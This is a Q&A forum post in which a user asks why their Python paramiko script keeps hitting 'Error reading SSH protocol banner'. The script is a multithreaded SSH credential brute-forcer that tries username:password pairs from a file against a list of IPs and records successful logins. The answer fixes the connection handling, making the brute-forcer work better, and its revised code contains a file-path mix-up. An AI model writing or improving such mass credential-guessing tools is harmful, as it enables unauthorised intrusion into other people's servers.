# Error reading SSH protocol banner[WinError 10054] An existing connection was forcibly closed by the remote host

Tags: python, python-3.x, ssh, network-programming, paramiko

I made this code to log on to several servers but it doesn't work optimally. It works until a certain moment, when I start to receive the same error countless times. Why is this happening and how can I fix it?

***Error:***

```
Traceback (most recent call last):
  File "C:\Users\Silver\AppData\Local\Programs\Python\Python39\lib\site-packages\paramiko\transport.py", line 2039, in run
    self._check_banner()
  File "C:\Users\Silver\AppData\Local\Programs\Python\Python39\lib\site-packages\paramiko\transport.py", line 2215, in _check_banner
    raise SSHException(
paramiko.ssh_exception.SSHException: Error reading SSH protocol banner[WinError 10054] An existing connection was forcibly closed by the remote host
```

***Code:***

```
import paramiko
from concurrent.futures import ThreadPoolExecutor
from threading import Thread
scanned = 0

def replace_cmd_line(output):
    print(output,end='\r')

def check_connection(ip,username,password):
    global scanned 
    scanned += 1
    try:
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(ip,22,user_pass[0],user_pass[1])
        print("Found " + ip + " ---> " + username + ':' + password)
        out = open("found_ssh_ips.txt",'a')
        out.write(f"{ip} {username}:{password}")
        out.close()
    except:
        ssh.close()
        return


executor = ThreadPoolExecutor(max_workers=5)
file = open('ips_ssh.txt','r')


def output():
    global scanned
    global file 
    while True:
        replace_cmd_line('Scanned ' + str(scanned))

Thread(target=output).start()

for ip in file.readlines():
    ip = ip[:-1]
    with open('passfile.txt','r') as passfile:
        for user_pass in passfile.readlines():
            user_pass = user_pass.split(':')
            user_pass[1] = user_pass[1][:-1]
            executor.submit(check_connection,ip,user_pass[0],user_pass[1])
```

Answer (score 0):

I guess the reason for the *Error reading SSH protocol banner* exception is that you close the connection only in case when an exception is generated. So better use a `finally` statement to close the connection in any case.

```
from concurrent.futures import ThreadPoolExecutor
from threading import Thread
scanned = 0

def replace_cmd_line(output):
    print(output,end='\r')

def check_connection(ip,username,password):
    global scanned
    scanned += 1
    ssh = None 
    try:
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(ip,22,user_pass[0],user_pass[1])
        print("Found " + ip + " ---> " + username + ':' + password)
        out = open("found_ssh_ips.txt",'a')
        out.write(f"{ip} {username}:{password}")
        out.close()
    except:
        pass 
    
    finally:
        if ssh:
            ssh.close()


executor = ThreadPoolExecutor(max_workers=5)
file = open("/home/thales/Desktop/WORKSPACE/CTAST/Updater/example_ips",'r')


def output():
    global scanned
    global file
    while True:
        replace_cmd_line('Scanned ' + str(scanned))

Thread(target=output).start()

for ip in file.readlines():
    ip = ip[:-1]
    with open("/home/thales/Desktop/WORKSPACE/CTAST/Updater/example_ips",'r') as passfile:
        for user_pass in passfile.readlines():
            user_pass = user_pass.split(':')
            user_pass[1] = user_pass[1][:-1]
            executor.submit(check_connection,ip,user_pass[0],user_pass[1])
```